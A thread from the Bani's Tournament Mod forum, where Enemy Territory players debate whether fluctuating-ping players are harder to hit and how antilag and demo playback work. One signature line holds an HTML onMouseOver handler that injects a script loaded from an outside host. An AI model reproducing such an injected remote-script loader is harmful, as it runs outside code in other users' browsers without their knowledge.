high pingers at et - are they really harder to hit?

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

SoL

Post by SoL »

Perhaps i misphrased that, what i meant was that from my own experiences i seemed to notice it was more difficult to hit someone whose ping was fluxing alot, as opposed to someone who has a stable ping. Perhaps it doesn't "play havoc with antilag" as i previously suggested but it seems to do something. Just yesterday i played against a Croatian clan and most of them had isdn connections, when they were shooting or being shot at their ping jumped from about 60 to 200 and i genuinely felt like some hits weren't connecting as they normally would. Please don't respond "think of how it is for them" and so on, playing on isdn must be hell and i bet it's difficult for them. I am simply pointing out that things don't seem to function correctly when a players ping is jumping up and down 50-100ms every few seconds. Although as i also said before, i don't seem to experience the same difficulties against someone with a stable ping (unless they have a reall low rate :D ).
bani
Site Admin

Post by bani »

if you have a demo of antilag malfunctioning, i'll be happy to take a look at it.
Grizbo

Post by Grizbo »

Bani, are you suggesting that what people are describing here, with hard to hit players NEVER happens, ever? I'm just not sure of your actual position on this, because your answers aren't always very clear, you seem to be saying its impossible to occur. I hope you won't take offense at me asking directly, but whether anti lag, high ping or whatever are all the wrong terms to use in connection with it and its something else, fine but some people ARE harder to hit in some circumstances and shots do "get lost" when they seem to be hitting the model.

No, I don't have demo's, I haven't played for a while, and frankly I tend to think of it as "one of those things" with online play, its irritating, but it doesn't seem fixable and I can accept it as part and parcel with the whole internet lag and online gaming situation. But to suggest it isn't there when its been experienced by millions is kinda...odd. If you've not experienced it, you're one of the lucky ones I guess.
aurellie

Post by aurellie »

Grizbo wrote:Bani, are you suggesting that what people are describing here, with hard to hit players NEVER happens, ever? I'm just not sure of your actual position on this, because your answers aren't always very clear, you seem to be saying its impossible to occur. I hope you won't take offense at me asking directly, but whether anti lag, high ping or whatever are all the wrong terms to use in connection with it and its something else, fine but some people ARE harder to hit in some circumstances and shots do "get lost" when they seem to be hitting the model.
I do experience that sometimes as well as low pingers. But this whole thread is about bashing high pingers...
Grizbo

Post by Grizbo »

Well actually, it was BY a high pinger (check first post) asking about the situation and if there was any truth to them sometimes being harder to hit ;) I just found it odd that Bani and others were seeming to be saying this situation never happens, and that was the bulk of the early replies to the original poster. When so many people seem to have experienced it, I just thought was a little strange.
bani
Site Admin

Post by bani »

if you have a demo of antilag malfunctioning, i'll be happy to take a look at it.
SoL

Post by SoL »

Unless the demo is an ETTV demo what does it show? Since a normal demo doesn't show exactly what happened at the time on the server it'll just look like you're not shooting accurately, right?
bani
Site Admin

Post by bani »

a demo records exactly what you saw, and should be accurate. speccing other players wont be accurate, but your view should be.
Rain

Post by Rain »

bani wrote:a demo records exactly what you saw, and should be accurate. speccing other players wont be accurate, but your view should be.
O_o.

A demo records snapshots, and demo playback never does prediction or extrapolation (just interpolation between snaps.) Demo playback won't be exactly the same.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
ouroboro

Post by ouroboro »

yeah, i played on a server in australia with 350 ping to see how good antilag was, i recorded a demo and when i watched it, my crosshair was always WAY behind my targets (even though i was landing my shots). presumably this was due to the demo recording what HAPPENED, not what i SAW. replaying it allowed me to see how far off my lag really made me, but the etpro antilag still allowed me to land my shots as i saw them :)

still sucks ass playing with a ping like that though, lol

it was also interesting watching the parts where i ahd massive packetloss - i would see a player smoothly glide from the point when the loss began to the point where he was when it ended, when watching the demo. neat stuff.

one strange thing, i revived a guy and died the very instant he was revived (as i recall it happening), but in the demo it turns out i just died and didn't revive him afterall. even though during the game i specifically remember hearing his *ghasp* sound as i revived him. dunno if that's cause b_antilag knew i should have gotten the revive according to what i saw, so it told me i did even thou the server said otherwise, or what
Please direct all gameplay-changing feature requests here.